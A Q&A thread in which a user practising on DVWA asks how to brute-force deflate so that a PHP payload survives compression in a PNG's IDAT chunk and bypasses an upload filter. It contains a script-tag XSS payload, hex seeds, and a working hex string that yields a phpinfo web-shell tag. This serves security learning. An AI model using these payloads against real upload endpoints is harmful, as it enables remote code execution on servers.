# PHP shell on PNG's IDAT Chunk

Tags: php, perl, zlib, deflate

I am studying about DVWA on file upload high-vulnerabilities. I want to bypass the filter, which only allows uploading of images like jpg or png. So I'm planning to embed payload `<?=phpinfo();` to image-file. After the search, I found these great blogs:

1. [An XSS on Facebook via PNGs & Wonky Content Types](https://whitton.io/articles/xss-on-facebook-via-png-content-types/)
2. [Encoding Web Shells in PNG IDAT chunks](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
3. [Revisiting XSS payloads in PNG IDAT chunks](https://www.adamlogue.com/revisiting-xss-payloads-in-png-idat-chunks/)

I'm too lazy to study about Deflate algorithm and search about png shell generator and found this great repository:

1. [PNG Payload Generator with PERL](https://github.com/akiraaisha/PNG-IDAT-chunks)

After clone and run, it works great. But the payload is for XSS Vuln [output here](https://i.stack.imgur.com/PqIMH.jpg):

```
<SCRIPT SRC=//ABC.DE></SCRIPT>
```

I want to finish the DVWA's objective. It says

> Execute any PHP function of your choosing on the target system (such as phpinfo() or system()) thanks to this file upload vulnerability.

So, the payload what I want is: `<?=phpinfo();?>` embed on PNG's IDAT chunks, which this payload survived from filters and compression on IDAT. From the repository, I found the bruteforce() logic where previously described by f1n1te / idontplaydarts blog. I copy the source code and try to bruteforce deflate compression with my payload [here](https://pastebin.com/UqEG1B85) but fail on symbol characters. Based on the source/generator, I have 2 question:

1. Why on [the source](https://pastebin.com/UqEG1B85), the bruteforce fail on symbol "<" and "?", and also another ascii symbol ? But it works on ascii "a-z" & "A-Z".
2. On the 3 blogs & 1 repository which I found, those are use this payload to bruteforce Deflate :

   `7ff399281922111510691928276e6e5c1e151e51241f576e69b16375535b6f` - f1n1te
   `f399281922111510691928276e6e562e2c1e581b1f576e69b16375535b6f0e7f` - Adam
   `03a39f67546f2c24152b116712546f112e29152b2167226b6f5f5310` - idontplaydarts
   `0000f399281922111510691928276e6e5313241e1f576e69b16375535b6f0000` - Repository

How those guys get all these payloads to bruteforce [Deflate Compression](https://en.wikipedia.org/wiki/DEFLATE)?

Comment: How did you get the prefix and suffix between $brute variable at line 17 of your code

Answer (score 2, accepted):

The bruteforce fails because it's too short. You need 5 nibbles, not only 4. I marked the extra digit with an arrow.

```
0000f399281922111510691928276e6e....1f576e69b16375535b6f0000 your template
0000f399281922111510691928276e6e51121f576e69b16375535b6f0000 "x\234c`\370<SCRIPT SRC=//PH></script>\3\3\0w\314\10)"
0000f399281922111510691928276e6e576f5f576e69b16375535b6f0000 "x\234c`\370<SCRIPT SRC=//<?></script>\3\3\0w\314\10)"
                                    ↑
```

The program also contains a bug that prevents it from completely exhausting the search space. The format specifier for sprintf must be zero-padded, otherwise the hexdigit strings are too short; in other words in the original program it must be `%04x`, not `%x`.

Comment: Hi @daxim, I have fixed my codes [here](https://pastebin.com/fNuXNE29) but seems stuck on bruteforce4 (I still working on it). Ya you are right mine before fail because it was too short and error from format specifier. Until now, I do brute-fix-brute-fix and need hours. by the way, how do you know that I need 5 nibbles on my template. And the position of nibbles you mark with arrow, is amazing I dont realize that.

Comment: `0000f39928192211151069192827576f511211221e1c2e12626b6f5f5f576e69b16375535b6f0000` ↔ `x\234c\140\370<SCRIPT SRC=<?PHPINFO();?>></script>\3\3\0\307\17\n\233`

Comment: How did you get the prefix and suffix between $brute variable at line 17 of your code